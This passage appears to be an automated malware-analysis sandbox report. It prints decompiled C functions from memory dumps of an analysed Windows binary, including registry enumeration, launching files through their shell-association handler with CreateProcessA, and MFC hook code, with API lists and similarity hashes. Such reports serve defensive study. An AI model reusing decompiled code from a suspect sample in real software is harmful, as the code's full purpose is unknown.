FreeLibrary.KERNEL32(?), ref: 1000D4D2

Strings

RegQueryValueExA, xrefs: 1000D300
RegEnumValueA, xrefs: 1000D321
RegCloseKey, xrefs: 1000D33B
%08X, xrefs: 1000D46E
RegOpenKeyExA, xrefs: 1000D311
ADVAPI32.dll, xrefs: 1000D2EF
RegEnumKeyExA, xrefs: 1000D32E

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$memset$Library$FreeLoadlstrcpystrchr
String ID: %08X$ADVAPI32.dll$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA
API String ID: 3659255042-2913591164
Opcode ID: 2e55518b5cc624818b8d33ae6b37d9d75e0748abc69a148362e09b5360c50c6f
Instruction ID: 6b962d0ac1cd546c5d457eaca0b9ddd1e33ba55db998258b5419e7ffb6aebb30
Opcode Fuzzy Hash: 2e55518b5cc624818b8d33ae6b37d9d75e0748abc69a148362e09b5360c50c6f
Instruction Fuzzy Hash: BE61C7B180022DABEF21EFA0DC84EEEBBB8FB08355F1041A6F915A2150D7359A55DF61

Uniqueness

Uniqueness Score: -1.00%

Function 100055B3, Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 139
registrystringprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100055B3(CHAR* _a4, CHAR* _a8) {
				void* _v8;
				long _v12;
				struct _PROCESS_INFORMATION _v28;
				struct _STARTUPINFOA _v96;
				char _v356;
				char _v856;
				char* _t36;
				CHAR* _t58;
				signed int _t75;

				_v12 = 0x104;
				memset( &_v356, 0, 0x104);
				_t36 = strrchr(_a4, 0x2e);
				if(_t36 == 0 || RegOpenKeyExA(0x80000000, _t36, 0, 0xf003f,  &_v8) != 0) {
					L3:
					return 0;
				} else {
					RegQueryValueA(_v8, 0,  &_v356,  &_v12);
					RegCloseKey(_v8);
					memset( &_v856, 0, 0x1f4);
					wsprintfA( &_v856, "%s\\shell\\open\\command",  &_v356);
					if(RegOpenKeyExA(0x80000000,  &_v856, 0, 0xf003f,  &_v8) == 0) {
						memset( &_v356, 0, 0x104);
						_v12 = 0x104;
						RegQueryValueA(_v8, 0,  &_v356,  &_v12);
						RegCloseKey(_v8);
						_t58 = strstr( &_v356, "\"%1");
						__eflags = _t58;
						if(_t58 != 0) {
							L7:
							lstrcpyA(_t58, _a4);
							L8:
							__eflags = _a8;
							_t75 = 0x10;
							memset( &(_v96.lpReserved), 0, _t75 << 2);
							_v96.cb = 0x44;
							if(__eflags != 0) {
								_v96.lpDesktop = "WinSta0\\Default";
							}
							return CreateProcessA(0,  &_v356, 0, 0, 0, 0, 0, 0,  &_v96,  &_v28);
						}
						_t58 = strstr( &_v356, "%1");
						__eflags = _t58;
						if(_t58 != 0) {
							goto L7;
						}
						lstrcatA( &_v356, " ");
						lstrcatA( &_v356, _a4);
						goto L8;
					}
					goto L3;
				}
			}

0x100055cf
0x100055d2
0x100055dc
0x100055e7
0x10005679
0x00000000
0x10005607
0x1000561c
0x10005627
0x10005637
0x1000564f
0x10005677
0x1000568a
0x10005695
0x100056a6
0x100056ab
0x100056bf
0x100056c2
0x100056c5
0x100056fd
0x10005701
0x10005707
0x1000570b
0x1000570e
0x10005712
0x10005714
0x1000571b
0x1000571d
0x1000571d
0x00000000
0x1000573a
0x100056d3
0x100056d6
0x100056d9
0x00000000
0x00000000
0x100056ed
0x100056f9
0x00000000
0x100056f9
0x00000000
0x10005677

APIs

memset.MSVCRT ref: 100055D2
strrchr.MSVCRT ref: 100055DC
RegOpenKeyExA.ADVAPI32(80000000,00000000,00000000,000F003F,?), ref: 100055FD
RegQueryValueA.ADVAPI32(?,00000000,?,100058BA), ref: 1000561C
RegCloseKey.ADVAPI32(?), ref: 10005627
memset.MSVCRT ref: 10005637
wsprintfA.USER32 ref: 1000564F
RegOpenKeyExA.ADVAPI32(80000000,?,00000000,000F003F,?), ref: 1000566F
memset.MSVCRT ref: 1000568A
RegQueryValueA.ADVAPI32(?,00000000,?,100058BA), ref: 100056A6
RegCloseKey.ADVAPI32(?), ref: 100056AB
strstr.MSVCRT ref: 100056BF
strstr.MSVCRT ref: 100056D3
lstrcatA.KERNEL32(?,100241A0), ref: 100056ED
lstrcatA.KERNEL32(?,100058BA), ref: 100056F9
lstrcpyA.KERNEL32(00000000,100058BA), ref: 10005701
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1000573A

Strings

D, xrefs: 10005714
%s\shell\open\command, xrefs: 10005649
"%1, xrefs: 100056B9

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: memset$CloseOpenQueryValuelstrcatstrstr$CreateProcesslstrcpystrrchrwsprintf
String ID: "%1$%s\shell\open\command$D
API String ID: 742877492-1634606264
Opcode ID: 5256531e564e8ef8922486d6a2460b1f194fa43f82fff974862b0e6f4435d51f
Instruction ID: 502725487be92dd647bcfbb5c03a2a2bff91d279b61bf3515b720059377133db
Opcode Fuzzy Hash: 5256531e564e8ef8922486d6a2460b1f194fa43f82fff974862b0e6f4435d51f
Instruction Fuzzy Hash: 2D410A7290012CBAEB11DB90DC89EEF7BBCEB48745F5500A5F608E6050D772AB89DB60

Uniqueness

Uniqueness Score: -1.00%

Function 004014A0, Relevance: 33.7, APIs: 18, Strings: 1, Instructions: 474
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E004014A0(intOrPtr __edx, void* __eflags) {
				char _v16;
				signed int _v24;
				signed int _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				char _v56;
				char _v60;
				char _v68;
				char _v484;
				char _v512;
				signed int _v788;
				signed int _v792;
				char _v794;
				signed int _v796;
				signed char _v800;
				signed int _v804;
				signed int _v808;
				void* _v812;
				char _v820;
				char _v828;
				signed int _v844;
				signed int _v848;
				char _v856;
				signed int _v880;
				signed int _v884;
				char _v892;
				intOrPtr _v908;
				char _v928;
				char _v936;
				intOrPtr _v948;
				intOrPtr _v960;
				char _v964;
				intOrPtr _v984;
				intOrPtr _v996;
				char _v1000;
				intOrPtr _v1016;
				char _v1028;
				signed int _v1032;
				char _v1036;
				intOrPtr _v1040;
				char _v1044;
				intOrPtr _v1048;
				char _v1052;
				char _v1056;
				char _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				char _v1076;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t169;
				signed int _t171;
				void* _t175;
				void* _t176;
				intOrPtr* _t182;
				void* _t196;
				void* _t198;
				void* _t200;
				signed int _t201;
				void* _t206;
				void* _t208;
				signed int _t209;
				void* _t214;
				void* _t215;
				void* _t216;
				signed int _t218;
				void* _t223;
				void* _t224;
				signed int _t225;
				void* _t230;
				void* _t231;
				void* _t232;
				signed int _t234;
				void* _t239;
				void* _t240;
				signed int _t241;
				signed int** _t253;
				signed int** _t255;
				signed int** _t257;
				void* _t278;
				signed int _t279;
				signed int _t280;
				signed int _t281;
				signed int _t341;
				signed int _t362;
				signed int _t364;
				signed int _t366;
				signed int _t368;
				void* _t369;
				signed int _t370;
				signed int _t371;
				signed int _t373;
				void* _t374;
				signed int _t375;
				void* _t379;
				signed int _t380;
				signed int _t382;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t388;
				void* _t389;
				void* _t391;
				void* _t392;
				void* _t393;
				void* _t394;
				void* _t395;
				void* _t397;
				void* _t398;
				void* _t399;
				void* _t400;
				void* _t401;
				void* _t402;

				_t340 = __edx;
				_push(0xffffffff);
				_push(E0043B947);
				_push( *[fs:0x0]);
				_t382 = (_t380 & 0xfffffff8) - 0x3f0;
				_t169 =  *0x44f5d0; // 0x8e7de579
				_v24 = _t169 ^ _t382;
				_push(4);
				_push(_t368);
				_t171 =  *0x44f5d0; // 0x8e7de579
				_push(_t171 ^ _t382);
				 *[fs:0x0] =  &_v16;
				_t373 = 0;
				_push(0);
				_push(0);
				_push(0x442798);
				_push(6);
				_push(0);
				_push(0);
				_push(1);
				E00414935(4,  &_v484, _t368, 0, __eflags);
				_v36 = 0;
				_t175 = E00414809(__eflags);
				_t404 = _t175 - 1;
				if(_t175 == 1) {
					_push( &_v1028);
					E00414AE1(4,  &_v512, _t340, _t368, 0, _t404);
					_v40 = 1;
					_t341 = _v1032;
					_push( &_v812);
					_push(_t341);
					_v812 = 0;
					_v808 = 0;
					_v804 = 0;
					_v800 = 0;
					_v796 = 0;
					_v792 = 0;
					if(E00414D65(4, _t341) != 0) {
						E00401EE0(4, _t379, 0x442b40);
						_v52 = 2;
						E00401EE0(4, _t379, 0x442b40);
						_v56 = 3;
						E00401EC0( &_v1068, 0x4427ac,  &_v794);
						E00401C50( &_v1064, _t379, _v1068,  *((intOrPtr*)(_v1068 - 0xc)));
						_push(_v808);
						E00401EC0( &_v1076, 0x4427b8, _v812);
						E00401C50( &_v1072, _t379, _v1076,  *((intOrPtr*)(_v1076 - 0xc)));
						_t196 = E00425875(4,  &_v844,  &_v1060,  &_v844);
						_t385 = _t382 + 0x24;
						if(_t196 != 0) {
							_v1052 = 0xffffffff;
						} else {
							_v1052 = _v1036;
						}
						_t198 = E00425875(4,  &_v820,  &_v964,  &_v820);
						_t386 = _t385 + 8;
						if(_t198 != _t373) {
							_v1048 = 0xffffffff;
						} else {
							_v1048 = _v960;
						}
						_t200 = E00425875(4,  &_v820,  &_v856,  &_v820);
						_t387 = _t386 + 8;
						if(_t200 != _t373) {
							_t279 = 0xffffffffffffffff;
							__eflags = 0xffffffffffffffff;
						} else {
							_t279 = _v848;
						}
						_t201 = E00425875(_t279,  &_v892,  &_v892,  &_v820);
						asm("sbb eax, eax");
						_t370 =  !( ~_t201) & _v880;
						_t206 = E00425875(_t279,  &_v892,  &_v1000,  &_v820);
						_t388 = _t387 + 0x10;
						if(_t206 == _t373) {
							_t373 = _v984 + 1;
						}
						_t208 = E00425875(_t279,  &_v820,  &_v928,  &_v820);
						_t389 = _t388 + 8;
						if(_t208 != 0) {
							_t209 = 0;
							__eflags = 0;
						} else {
							_t209 = _v908 + 0x76c;
						}
						_push(_v1052);
						_push(_v1048);
						_push(_t279);
						_push(_t370);
						_push(_t373);
						E00401EC0( &_v1060, 0x4427c8, _t209);
						E00401C50( &_v1056, _t379, _v1060,  *((intOrPtr*)(_v1060 - 0xc)));
						_t214 = E00425875(_t279,  &_v936,  &_v936,  &_v828);
						_t391 = _t389 + 0x28;
						if(_t214 != 0) {
							_v1048 = 0xffffffff;
						} else {
							_v1048 = _v928;
						}
						_t215 = E00425875(_t279,  &_v1000,  &_v1000,  &_v820);
						_t392 = _t391 + 8;
						if(_t215 != 0) {
							_v1052 = 0xffffffff;
						} else {
							_v1052 = _v996;
						}
						_t352 =  &_v892;
						_t216 = E00425875(_t279,  &_v892,  &_v892,  &_v820);
						_t393 = _t392 + 8;
						if(_t216 != 0) {
							_t280 = _t279 | 0xffffffff;
							__eflags = _t280;
						} else {
							_t280 = _v884;
						}
						_t218 = E00425875(_t280, _t352,  &_v856,  &_v820);
						asm("sbb eax, eax");
						_t371 =  !( ~_t218) & _v844;
						_t223 = E00425875(_t280,  &_v820,  &_v964,  &_v820);
						_t394 = _t393 + 0x10;
						if(_t223 != 0) {
							_t375 = 0;
							__eflags = 0;
						} else {
							_t375 = _v948 + 1;
						}
						_t224 = E00425875(_t280,  &_v1036,  &_v1036,  &_v820);
						_t395 = _t394 + 8;
						if(_t224 != 0) {
							_t225 = 0;
							__eflags = 0;
						} else {
							_t225 = _v1016 + 0x76c;
						}
						_push(_v1048);
						_push(_v1052);
						_push(_t280);
						_push(_t371);
						_push(_t375);
						E00401EC0( &_v1060, 0x4427f0, _t225);
						E00401C50( &_v1056, _t379, _v1060,  *((intOrPtr*)(_v1060 - 0xc)));
						_t230 = E00425875(_t280,  &_v936,  &_v936,  &_v828);
						_t397 = _t395 + 0x28;
						if(_t230 != 0) {
							_v1048 = 0xffffffff;
						} else {
							_v1048 = _v928;
						}
						_t231 = E00425875(_t280,  &_v1000,  &_v1000,  &_v820);
						_t398 = _t397 + 8;
						if(_t231 != 0) {
							_v1052 = 0xffffffff;
						} else {
							_v1052 = _v996;
						}
						_t358 =  &_v892;
						_t232 = E00425875(_t280,  &_v892,  &_v892,  &_v820);
						_t399 = _t398 + 8;
						if(_t232 != 0) {
							_t281 = _t280 | 0xffffffff;
							__eflags = _t281;
						} else {
							_t281 = _v884;
						}
						_t234 = E00425875(_t281, _t358,  &_v856,  &_v820);
						asm("sbb eax, eax");
						_t368 =  !( ~_t234) & _v844;
						_t239 = E00425875(_t281,  &_v820,  &_v964,  &_v820);
						_t400 = _t399 + 0x10;
						if(_t239 != 0) {
							_t373 = 0;
							__eflags = 0;
						} else {
							_t373 = _v948 + 1;
						}
						_t240 = E00425875(_t281,  &_v1036,  &_v1036,  &_v820);
						_t401 = _t400 + 8;
						if(_t240 != 0) {
							_t241 = 0;
							__eflags = 0;
						} else {
							_t241 = _v1016 + 0x76c;
						}
						_push(_v1048);
						_push(_v1052);
						_push(_t281);
						_push(_t368);
						_push(_t373);
						E00401EC0( &_v1060, 0x442818, _t241);
						_t402 = _t401 + 0x20;
						E00401C50( &_v1056, _t379, _v1060,  *((intOrPtr*)(_v1060 - 0xc)));
						E00401EE0(_t281, _t379, 0x442b40);
						_v60 = 4;
						if((_v800 & 0x00000001) != 0) {
							E00401B30( &_v1044, _t373, 0x442840);
						}
						if((_v788 & 0x00000002) != 0) {
							E00401B30( &_v1044, _t373, 0x442848);
						}
						if((_v788 & 0x00000004) != 0) {
							E00401B30( &_v1044, _t373, 0x442850);
						}
						if((_v788 & 0x00000008) != 0) {
							E00401B30( &_v1044, _t373, 0x442858);
						}
						if((_v788 & 0x00000010) != 0) {
							E00401B30( &_v1044, _t373, 0x442860);
						}
						_t427 = _v788 & 0x00000020;
						if((_v788 & 0x00000020) != 0) {
							E00401B30( &_v1044, _t373, 0x442868);
						}
						_t362 =  &_v1060;
						E00401EC0(_t362, 0x442870, _v1044);
						_t382 = _t402 + 0xc;
						E00401C50( &_v1056, _t379, _v1060,  *((intOrPtr*)(_v1060 - 0xc)));
						E0040DECE(4, _t368, _t373, _t427, _v1064, 0, 0);
						_v68 = 3;
						_t253 = _v1064 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						_t364 = (_t362 | 0xffffffff) - 1;
						if(_t364 <= 0) {
							_t364 =  *( *_t253);
							 *((intOrPtr*)( *((intOrPtr*)(_t364 + 4))))(_t253);
						}
						_v48 = 2;
						_t255 = _v1060 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						_t366 = (_t364 | 0xffffffff) - 1;
						if(_t366 <= 0) {
							_t366 =  *( *_t255);
							 *((intOrPtr*)( *((intOrPtr*)(_t366 + 4))))(_t255);
						}
						_v48 = 1;
						_t257 = _v1056 + 0xfffffff0;
						asm("lock xadd [ecx], edx");
						_t341 = (_t366 | 0xffffffff) - 1;
						if(_t341 <= 0) {
							_t341 =  *( *_t257);
							 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))(_t257);
						}
					}
					_v48 = 0;
					_t182 = _v1040 + 0xfffffff0;
					asm("lock xadd [ecx], edx");
					_t340 = (_t341 | 0xffffffff) - 1;
					_t431 = (_t341 | 0xffffffff) - 1;
					if((_t341 | 0xffffffff) - 1 <= 0) {
						_t340 =  *((intOrPtr*)( *_t182));
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t182)) + 4))))(_t182);
					}
				}
				_v36 = 0xffffffff;
				_t176 = E004148F4(4,  &_v512, _t340, _t368, _t373, _t431);
				 *[fs:0x0] = _v44;
				_pop(_t369);
				_pop(_t374);
				_pop(_t278);
				return E0042569C(_t176, _t278, _v52 ^ _t382, _t340, _t369, _t374);
			}

APIs

Part of subcall function 00414935: __EH_prolog3_GS.LIBCMT ref: 0041493F
Part of subcall function 00414935: _memset.LIBCMT ref: 00414992
Part of subcall function 00414935: GetVersionExA.KERNEL32(?), ref: 004149A7
Part of subcall function 00414935: _malloc.LIBCMT ref: 004149D0
Part of subcall function 00414935: _memset.LIBCMT ref: 004149E7

Part of subcall function 00414809: lstrlenA.KERNEL32(?,?,00000000,?,?,?,?,0040150E,00000001,00000000,00000000,00000006,00442798,00000000,00000000,8E7DE579), ref: 00414817
Part of subcall function 00414809: _memset.LIBCMT ref: 00414830
Part of subcall function 00414809: GetFocus.USER32 ref: 00414838
Part of subcall function 00414809: IsWindowEnabled.USER32(?), ref: 00414865
Part of subcall function 00414809: EnableWindow.USER32(?,00000000), ref: 00414878
Part of subcall function 00414809: EnableWindow.USER32(?,00000001), ref: 004148C1
Part of subcall function 00414809: IsWindow.USER32(?), ref: 004148C7
Part of subcall function 00414809: SetFocus.USER32(?), ref: 004148D5

Part of subcall function 00414AE1: __EH_prolog3.LIBCMT ref: 00414AE8
Part of subcall function 00414AE1: GetParent.USER32(?), ref: 00414B38
Part of subcall function 00414AE1: SendMessageA.USER32(?,00000464,00000104,?), ref: 00414B4C
Part of subcall function 00414AE1: GetParent.USER32(?), ref: 00414B7F
Part of subcall function 00414AE1: SendMessageA.USER32(?,00000465,00000104,?), ref: 00414B93

Part of subcall function 00401C50: _memcpy_s.LIBCMT ref: 00401C9C

Part of subcall function 00401C50: FindResourceA.KERNEL32(?,00000034,00000005), ref: 0040CA05
Part of subcall function 00401C50: LoadResource.KERNEL32(?,00000000,?,?,00000030,004136DE,?), ref: 0040CA0D
Part of subcall function 00401C50: FreeResource.KERNEL32(00000000,00000000,?,?,?,?,00000030,004136DE,?), ref: 0040CA25

__localtime64_s.LIBCMT ref: 0040160D
__localtime64_s.LIBCMT ref: 00401638
__localtime64_s.LIBCMT ref: 00401666
__localtime64_s.LIBCMT ref: 0040168E
__localtime64_s.LIBCMT ref: 004016AF
__localtime64_s.LIBCMT ref: 004016D2
__localtime64_s.LIBCMT ref: 00401730
__localtime64_s.LIBCMT ref: 0040175E
__localtime64_s.LIBCMT ref: 0040178C
__localtime64_s.LIBCMT ref: 004017B4
__localtime64_s.LIBCMT ref: 004017D8
__localtime64_s.LIBCMT ref: 004017FF
__localtime64_s.LIBCMT ref: 0040185A
__localtime64_s.LIBCMT ref: 00401888
__localtime64_s.LIBCMT ref: 004018B6
__localtime64_s.LIBCMT ref: 004018DE
__localtime64_s.LIBCMT ref: 00401902
__localtime64_s.LIBCMT ref: 00401929

Strings

, xrefs: 00401A02

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: __localtime64_s$Window$Resource_memset$EnableFocusMessageParentSend$EnabledFindFreeH_prolog3H_prolog3_LoadVersion_malloc_memcpy_slstrlen
String ID:
API String ID: 915173238-3916222277
Opcode ID: f8e73eb9d5674b509b99446d12c9768c5487f11104ca5ccef5c1eafaa4075f2f
Instruction ID: 46130d15622264611ec9feb4a2d0b772762c042380647e8a66011a9b99524e8b
Opcode Fuzzy Hash: f8e73eb9d5674b509b99446d12c9768c5487f11104ca5ccef5c1eafaa4075f2f
Instruction Fuzzy Hash: F502C6715083809BD324DB65CC81F9BB3E8AFD4354F044B2EF599932E1E778A905CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00412666, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00412666(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				void* _t55;
				signed int _t56;
				void* _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				short _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t107;
				long* _t109;
				long _t111;
				signed int _t112;
				CHAR* _t113;
				intOrPtr _t114;
				void* _t117;
				void* _t120;
				intOrPtr _t121;

				_t120 = __eflags;
				_t106 = __edi;
				_push(0x148);
				E00427243(E0043A1F1, __ebx, __edi, __esi);
				_t111 =  *(_t117 + 0x10);
				_t94 =  *(_t117 + 0xc);
				_push(E0040D295);
				 *(_t117 - 0x120) = _t111;
				_t54 = E0041720B(_t94, 0x450cbc, __edi, _t111, _t120);
				_t121 = _t54;
				_t97 = 0 | _t121 == 0x00000000;
				 *((intOrPtr*)(_t117 - 0x11c)) = _t54;
				if(_t121 == 0) {
					_t54 = E00415838(_t97);
				}
				if( *(_t117 + 8) == 3) {
					_t107 =  *_t111;
					_t112 =  *(_t54 + 0x14);
					_t55 = E0040E67F(_t94, _t107, _t112, __eflags);
					__eflags = _t112;
					_t56 =  *(_t55 + 0x14) & 0x000000ff;
					 *(_t117 - 0x124) = _t56;
					if(_t112 != 0) {
						L7:
						__eflags =  *0x452a38;
						if( *0x452a38 == 0) {
							L12:
							__eflags = _t112;
							if(__eflags == 0) {
								__eflags =  *0x452654;
								if( *0x452654 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x452654; // 0x0
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										__eflags = _t59;
										 *(_t117 - 0x14) = _t59;
										if(_t59 != 0) {
											_t113 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t113);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t113,  *(_t117 - 0x14));
												_t66 = GetPropA(_t94, _t113);
												__eflags = _t66 -  *(_t117 - 0x14);
												if(_t66 ==  *(_t117 - 0x14)) {
													GlobalAddAtomA(_t113);
													SetWindowLongA(_t94, 0xfffffffc, E00412522);
												}
											}
										}
										L27:
										_t106 =  *((intOrPtr*)(_t117 - 0x11c));
										_t60 = CallNextHookEx( *(_t106 + 0x28), 3, _t94,  *(_t117 - 0x120));
										__eflags =  *(_t117 - 0x124);
										_t111 = _t60;
										if( *(_t117 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t106 + 0x28));
											_t50 = _t106 + 0x28;
											 *_t50 =  *(_t106 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t114 = 0x30;
								E004277B0(_t107, _t117 - 0x154, 0, _t114);
								 *((intOrPtr*)(_t117 - 0x154)) = _t114;
								_push(_t117 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E0040F909(_t94, _t107, "#32768", __eflags);
								__eflags = _t72;
								 *0x452654 = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t117 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t117 - 0x19)) = 0;
									_t76 = E00426243(_t117 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E0040E6CB(_t117 - 0x18, __eflags,  *((intOrPtr*)(_t112 + 0x1c)));
							 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
							E00410E83(_t112, _t117, _t94);
							 *((intOrPtr*)( *_t112 + 0x50))();
							_t109 =  *((intOrPtr*)( *_t112 + 0xf0))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E00411580);
							__eflags = _t83 - E00411580;
							if(_t83 != E00411580) {
								 *_t109 = _t83;
							}
							 *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t117 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t117 - 4) =  *(_t117 - 4) | 0xffffffff;
							__eflags =  *(_t117 - 0x14);
							if( *(_t117 - 0x14) != 0) {
								_push( *(_t117 - 0x18));
								_push(0);
								E0040DF8F();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t107 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t117 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t107 + 0x28) & 0x0000ffff, _t117 - 0x18, 5);
							_t87 = _t117 - 0x18;
						}
						_t88 = E0040AA7B(_t87, "ime");
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t107 + 0x20) & 0x40000000;
					if(( *(_t107 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t117 + 8), _t94, _t111);
					L30:
					return E004272C6(_t94, _t106, _t111);
				}
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00412670

Part of subcall function 0041720B: __EH_prolog3.LIBCMT ref: 00417212

CallNextHookEx.USER32(?,?,?,?), ref: 004126B4

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

GetClassLongA.USER32 ref: 004126F8
GlobalGetAtomNameA.KERNEL32 ref: 00412722
SetWindowLongA.USER32 ref: 00412777
_memset.LIBCMT ref: 004127C1
GetClassLongA.USER32 ref: 004127F1
GetClassNameA.USER32(?,?,00000100), ref: 00412812
GetWindowLongA.USER32 ref: 00412836
GetPropA.USER32 ref: 00412850
SetPropA.USER32 ref: 0041285B
GetPropA.USER32 ref: 00412863
GlobalAddAtomA.KERNEL32 ref: 0041286B
SetWindowLongA.USER32 ref: 00412879
CallNextHookEx.USER32(?,00000003,?,?), ref: 00412891
UnhookWindowsHookEx.USER32(?), ref: 004128A5

Strings

#32768, xrefs: 004127D3, 004127D8, 00412822
ime, xrefs: 0041272B
AfxOldWndProc423, xrefs: 00412849, 0041284E, 00412859, 00412861, 0041286A

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 867647115-4034971020
Opcode ID: 97ae0c641ff64587212fd83b916603213ca978be730ad98e14fce76326e3f67b
Instruction ID: c477e48c44754b4278aacc20ed32f1acd11f200eb1a26bd58407a09422d9ae4e
Opcode Fuzzy Hash: 97ae0c641ff64587212fd83b916603213ca978be730ad98e14fce76326e3f67b
Instruction Fuzzy Hash: 8761C571900215ABCB21AB62DE49BEF7B78BF14311F100266F805E22D1D778DDA1CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 10004E22, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 177
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E10004E22(CHAR* _a4, CHAR* _a8) {
				char* _v8;
				struct _STARTUPINFOA _v76;
				struct _PROCESS_INFORMATION _v92;
				char _v352;
				void _v611;
				char _v612;
				void _v871;
				char _v872;
				char _v1372;
				char* _t44;
				CHAR* _t70;
				int _t84;
				signed int _t88;
				signed int _t94;
				signed int _t98;
				char* _t109;
				void* _t111;
				void* _t112;
				void* _t113;

				memset( &_v352, 0, 0x104);
				_t44 = strrchr(_a4, 0x2e);
				_t112 = _t111 + 0x14;
				_v8 = _t44;
				if(_t44 == 0) {
					L9:
					return 0;
				}
				_t88 = 0x40;
				_v612 = 0;
				memset( &_v611, 0, _t88 << 2);
				_t113 = _t112 + 0xc;
				asm("stosw");
				asm("stosb");
				if(strrchr(_v8, 0x20) == 0) {
					strcpy( &_v612, _v8);
					L7:
					if(E1000D28E(0x80000000,  &_v612, 0, 1,  &_v352, 0, 0x104, 0) == 0) {
						goto L9;
					}
					memset( &_v1372, 0, 0x1f4);
					wsprintfA( &_v1372, "%s\\shell\\open\\command",  &_v352);
					memset( &_v352, 0, 0x104);
					_t94 = 0x40;
					_v872 = 0;
					memset( &_v871, 0, _t94 << 2);
					asm("stosw");
					asm("stosb");
					if(E1000D28E(0x80000000,  &_v1372, 0, 2,  &_v872, 0, 0x104, 0) != 0) {
						ExpandEnvironmentStringsA( &_v872,  &_v352, 0x104);
						_t70 = strstr( &_v352, "\"%1");
						__eflags = _t70;
